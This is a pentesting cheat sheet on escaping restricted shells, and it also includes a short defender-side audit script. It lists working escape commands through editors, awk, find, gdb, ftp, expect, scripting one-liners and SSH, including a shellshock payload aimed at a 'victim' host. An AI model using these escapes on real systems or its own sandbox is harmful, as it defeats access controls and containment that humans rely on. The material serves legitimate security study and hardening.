Breaking Out Of The Jail

You can execute built-in shell commands, as well as the ones in your PATH

Enumerate

  • Get environment variables: env or printenv
  • Any programs as different user: sudo -l
  • Check current PATH: echo $PATH
  • List contents of PATH:
    • ls path/to/PATH
    • echo path/to/PATH/*
  • List export variables: export -p

Research

Research each executable command and look for odd parameters (anything that spawns a subprocess or writes files).
Check out:

  • man pages
  • GTFOBins
  • Vulnerabilities in the command

Attack Vectors

  • If "/" is allowed in command names, /bin/bash

Writable PATH

  • If PATH is writable, game on!
    • export PATH=/usr/local/bin:/usr/bin:/bin:$PATH

Editors

  • vi, vim, man, less, more
    :set shell=/bin/bash
    :shell
    # or
    :!/bin/bash
  • nano
    # Control - R, Control - X
    ^R^X
    reset; sh 1>&0 2>&0
  • ed
    !'/bin/sh'

Common Tools

# cp
cp /bin/sh /current/PATH

# ftp
ftp
ftp>!/bin/sh

# gdb
gdb
(gdb)!/bin/sh

# awk
awk 'BEGIN {system("/bin/bash")}'

# find
find / -name bleh -exec /bin/bash \;

# expect
expect
spawn sh

SSH

# run a command in place of the remote login shell, before its profile is loaded
ssh test@victim -t "/bin/sh"

# start ssh without loading any profile
ssh test@victim -t "bash --noprofile"

# try shellshock
ssh test@victim -t "() { :; }; /bin/bash"

Scripting Languages

# python
python -c 'import os;os.system("/bin/bash")'

# perl
perl -e 'exec "/bin/sh";'

# ruby (the path must be a quoted string; a bare /bin/sh is parsed as a regex literal)
ruby -e 'exec "/bin/sh"'

Writing To a File

echo "hello world!" | tee hello.sh
echo "append to the same file" | tee -a hello.sh
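A defender-side check for the lists above (an added example, not part of the original notes): assuming the restricted shell's PATH points at a single jail directory such as /home/jailed/bin (assumed path), these POSIX sh functions report which of the escape-capable commands named on this page are reachable from it and whether the directory itself is writable.

```shell
# Added audit helper (not from the original notes). Assumes the restricted
# shell's PATH points at one jail directory, e.g. /home/jailed/bin (assumed
# path), holding the commands the jailed user is allowed to run.

# Commands listed on this page that offer a shell escape or a file write.
ESCAPE_BINS="vi vim man less more nano ed cp ftp gdb awk find expect python perl ruby tee"

# Echo, on one line, which escape-capable commands exist (as files or
# symlinks) in the given directory.  Usage: audit_path_dir /home/jailed/bin
audit_path_dir() {
    found=""
    for b in $ESCAPE_BINS; do
        # -x follows symlinks, so a link pointing into /usr/bin is caught too
        [ -x "$1/$b" ] && found="$found $b"
    done
    echo "${found# }"
}

# Print a report for a jail directory; returns 0 only when nothing was found.
audit_jail() {
    status=0
    if [ -w "$1" ]; then
        echo "WRITABLE: $1 (jailed user can drop their own binaries into PATH)"
        status=1
    fi
    esc=$(audit_path_dir "$1")
    if [ -n "$esc" ]; then
        echo "ESCAPES: $esc"
        status=1
    fi
    return $status
}
```

Run audit_jail against every directory in the jailed user's PATH; a clean result only means none of the commands on this page are reachable by name, so any custom binaries placed in the jail still need their own review.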

Resources

SANS
Hacking Articles
Escape From SHELLcatraz